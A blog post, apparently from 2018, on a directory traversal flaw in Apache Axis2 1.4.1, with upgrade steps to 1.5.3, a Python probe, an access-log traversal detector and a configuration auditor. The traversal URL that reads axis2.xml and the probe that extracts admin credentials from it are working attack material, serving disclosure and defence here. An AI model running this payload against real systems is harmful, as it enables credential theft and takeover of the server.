Saturday, March 3, 2018

Axis 2 Directory traversal vulnerability


Recently I ran into a security issue in an Axis2 (1.4.1) service. An attacker can fetch the configuration file through the link https://victim.com/axis2/services/Version?xsd=../conf/axis2.xml and read the Axis2 admin username and password from it. With those credentials the attacker can log in to the Axis2 administration console, deploy an arbitrary malicious service and take over the system.
The issue affects Axis2 versions below 1.5.3. Upgrading to 1.5.3 (at minimum; later versions also work) fixes it. Because the configuration file was readable by anyone who could reach the service, treat the admin credentials in it as disclosed and change them as part of the upgrade.
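To confirm whether an endpoint is affected, and to find attempts in web server logs afterwards, the following script is an added example (not code from the original post or from Apache Axis2). It requests the traversal URL above, treats the response as a leak only if it parses as Axis2's own configuration file (root element <axisconfig> with userName/password parameters, which is what the stock axis2.xml contains), and separately flags access-log lines whose xsd= or wsdl= parameter climbs out of the service directory, including URL-encoded forms. The base URL, the Version service name, the sample configuration and the log lines are assumptions or constructed input.

```python
"""Probe an Axis2 endpoint for the ?xsd= traversal and spot it in access logs.

Added example, not code from the original post or from Apache Axis2. The
target URL, service name, sample axis2.xml and log lines are constructed.
"""
import re
import urllib.parse
import urllib.request
import xml.etree.ElementTree as ET

# Relative path from the post's URL: climbs out of the service's metadata
# directory into the conf directory that holds axis2.xml.
TRAVERSAL_PATH = "../conf/axis2.xml"

# Constructed stand-in for a leaked axis2.xml (only the relevant parameters).
SAMPLE_AXIS2_XML = """<axisconfig name="AxisJava2.0">
    <parameter name="hotdeployment">true</parameter>
    <parameter name="userName">admin</parameter>
    <parameter name="password">axis2</parameter>
</axisconfig>
"""

# Constructed Apache-style access log lines, not real traffic.
SAMPLE_ACCESS_LOG = [
    '10.0.0.5 - - [03/Mar/2018:10:01:02 +0000] "GET /axis2/services/Version?wsdl HTTP/1.1" 200 2210',
    '10.0.0.9 - - [03/Mar/2018:10:01:07 +0000] "GET /axis2/services/Version?xsd=../conf/axis2.xml HTTP/1.1" 200 21994',
    '10.0.0.9 - - [03/Mar/2018:10:01:09 +0000] "GET /axis2/services/Version?xsd=%2e%2e%2fconf%2faxis2.xml HTTP/1.1" 200 21994',
    '10.0.0.7 - - [03/Mar/2018:10:02:00 +0000] "GET /axis2/services/Version?xsd=Version.xsd HTTP/1.1" 404 180',
]


def build_probe_url(base_url, service="Version"):
    """Return the traversal URL from the post for a given Axis2 base URL."""
    return f"{base_url.rstrip('/')}/axis2/services/{service}?xsd={TRAVERSAL_PATH}"


def leaked_credentials(body):
    """Return (userName, password) if the body is an axis2.xml, else None.

    Anything that is not Axis2's configuration (an error page, a genuine XSD,
    non-XML) means the traversal was blocked and yields None.
    """
    try:
        root = ET.fromstring(body)
    except ET.ParseError:
        return None
    if root.tag != "axisconfig":
        return None
    params = {p.get("name"): (p.text or "").strip() for p in root.iter("parameter")}
    if "userName" in params and "password" in params:
        return params["userName"], params["password"]
    return None


def _default_fetch(url):
    """Plain GET; assumes the target needs no proxy or authentication."""
    with urllib.request.urlopen(url, timeout=10) as resp:
        return resp.read().decode("utf-8", "replace")


def probe(base_url, fetch=_default_fetch):
    """Fetch the traversal URL and report whether axis2.xml was disclosed.

    `fetch` is injectable so the check can be exercised offline.
    """
    url = build_probe_url(base_url)
    try:
        body = fetch(url)
    except Exception as exc:  # connection refused, HTTP error, timeout ...
        return {"url": url, "vulnerable": False, "credentials": None, "error": str(exc)}
    creds = leaked_credentials(body)
    return {"url": url, "vulnerable": creds is not None, "credentials": creds, "error": None}


# Query parameters Axis2 uses to serve service metadata files.
_META_PARAM = re.compile(r'[?&](xsd|wsdl2?)=([^ &"]*)', re.IGNORECASE)


def flag_traversal_requests(log_lines):
    """Return log lines whose xsd=/wsdl= value contains '..' after URL-decoding.

    Decoding twice also catches double-encoded variants such as %252e%252e.
    """
    hits = []
    for line in log_lines:
        for _name, value in _META_PARAM.findall(line):
            if ".." in urllib.parse.unquote(urllib.parse.unquote(value)):
                hits.append(line)
                break
    return hits


if __name__ == "__main__":
    import sys
    if len(sys.argv) > 1:
        print(probe(sys.argv[1]))
    for hit in flag_traversal_requests(SAMPLE_ACCESS_LOG):
        print("traversal attempt:", hit)
```

Run it with the base URL of the service as the only argument (only against systems you are authorised to test); without an argument it just runs the log check over the constructed sample lines.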

The root cause of the issue is the following configuration in the Axis2 1.4.1 axis2.xml:

<transportReceiver name="http"
                       class="org.apache.axis2.transport.http.SimpleHTTPServer">
        <parameter name="port">8080</parameter>
    </transportReceiver>

SimpleHTTPServer does not reject requests whose path climbs out of the service directory, so directory traversal is possible.

I followed the steps below to upgrade Axis2 from 1.4.1 to 1.5.3:

1.     Upgrade Axis2 to 1.5.3 and update the JARs.

2.     Once the JARs have been upgraded, change the following in conf\axis2.xml.

Replace

<transportReceiver name="http"
                       class="org.apache.axis2.transport.http.SimpleHTTPServer">
        <parameter name="port">8080</parameter>
    </transportReceiver>

with

<transportReceiver name="http"
                       class="org.apache.axis2.transport.http.AxisServletListener">
        <parameter name="port">8080</parameter>
    </transportReceiver>

    <transportReceiver name="https"
                       class="org.apache.axis2.transport.http.AxisServletListener">
        <parameter name="port">8443</parameter>
    </transportReceiver>
3.     Comment out TCPTransportSender in axis2.xml. In 1.5 the TCP transport is no longer part of the core distribution, so the class would fail to load on startup if it stayed configured:
<!--
    <transportSender name="tcp"
                     class="org.apache.axis2.transport.tcp.TCPTransportSender"/>-->
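After the upgrade it is worth checking that the edited axis2.xml actually matches the target state of steps 2 and 3, and that the admin password read through the traversal has been changed. The following audit script is an added example (not code from the original post or from Apache Axis2): it parses axis2.xml, flags any http/https transportReceiver that still points at SimpleHTTPServer or is missing, flags an active TCPTransportSender (a commented-out one is invisible to the XML parser, which is exactly what step 3 intends), and flags a password that is still the value shipped in the stock file. The two embedded configurations are constructed before/after samples.

```python
"""Audit an axis2.xml against the upgrade steps above.

Added example, not part of the original post or of Apache Axis2. The two
sample configurations are constructed; the class names and the shipped
default password are those of the stock Axis2 distribution.
"""
import sys
import xml.etree.ElementTree as ET

SERVLET_LISTENER = "org.apache.axis2.transport.http.AxisServletListener"
SIMPLE_HTTP_SERVER = "org.apache.axis2.transport.http.SimpleHTTPServer"
TCP_SENDER = "org.apache.axis2.transport.tcp.TCPTransportSender"
DEFAULT_ADMIN_PASSWORD = "axis2"  # value in the stock axis2.xml

# Constructed 1.4.1-style configuration (before the upgrade).
BEFORE = """<axisconfig name="AxisJava2.0">
    <parameter name="userName">admin</parameter>
    <parameter name="password">axis2</parameter>
    <transportReceiver name="http" class="org.apache.axis2.transport.http.SimpleHTTPServer">
        <parameter name="port">8080</parameter>
    </transportReceiver>
    <transportSender name="tcp" class="org.apache.axis2.transport.tcp.TCPTransportSender"/>
</axisconfig>"""

# Constructed configuration after applying steps 2 and 3 and rotating the password.
AFTER = """<axisconfig name="AxisJava2.0">
    <parameter name="userName">admin</parameter>
    <parameter name="password">Rotated-after-upgrade-1</parameter>
    <transportReceiver name="http" class="org.apache.axis2.transport.http.AxisServletListener">
        <parameter name="port">8080</parameter>
    </transportReceiver>
    <transportReceiver name="https" class="org.apache.axis2.transport.http.AxisServletListener">
        <parameter name="port">8443</parameter>
    </transportReceiver>
    <!--
    <transportSender name="tcp" class="org.apache.axis2.transport.tcp.TCPTransportSender"/>-->
</axisconfig>"""


def audit_axis2_config(xml_text):
    """Return a list of findings; an empty list means the file matches the target state."""
    root = ET.fromstring(xml_text)
    findings = []

    # Step 2: both http and https must use the servlet listener, not SimpleHTTPServer.
    receivers = {r.get("name"): r.get("class") for r in root.iter("transportReceiver")}
    for name in ("http", "https"):
        cls = receivers.get(name)
        if cls is None:
            findings.append(f"transportReceiver '{name}' is missing")
        elif cls == SIMPLE_HTTP_SERVER:
            findings.append(f"transportReceiver '{name}' still uses SimpleHTTPServer")
        elif cls != SERVLET_LISTENER:
            findings.append(f"transportReceiver '{name}' uses unexpected class {cls}")

    # Step 3: the TCP sender must be gone; a commented-out element is not parsed.
    senders = {s.get("name"): s.get("class") for s in root.iter("transportSender")}
    if senders.get("tcp") == TCP_SENDER:
        findings.append("transportSender 'tcp' (TCPTransportSender) is still active; comment it out")

    # Follow-up: the old file was world-readable, so the shipped password must not survive.
    params = {p.get("name"): (p.text or "").strip() for p in root.iter("parameter")}
    if params.get("password", DEFAULT_ADMIN_PASSWORD) == DEFAULT_ADMIN_PASSWORD:
        findings.append("admin password is missing or still the shipped default; rotate it, it may already have been read")

    return findings


if __name__ == "__main__":
    path = sys.argv[1] if len(sys.argv) > 1 else None
    text = open(path, encoding="utf-8").read() if path else BEFORE
    for finding in audit_axis2_config(text) or ["OK: configuration matches the upgraded state"]:
        print(finding)
```

Point it at the real file (python audit_axis2.py /path/to/conf/axis2.xml, a hypothetical file name) and fix every line it prints; run without an argument it audits the constructed "before" sample.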

1 comment:

Unknown said...

Did you have to generate the WSDL2Java code after the upgrade to 1.5?
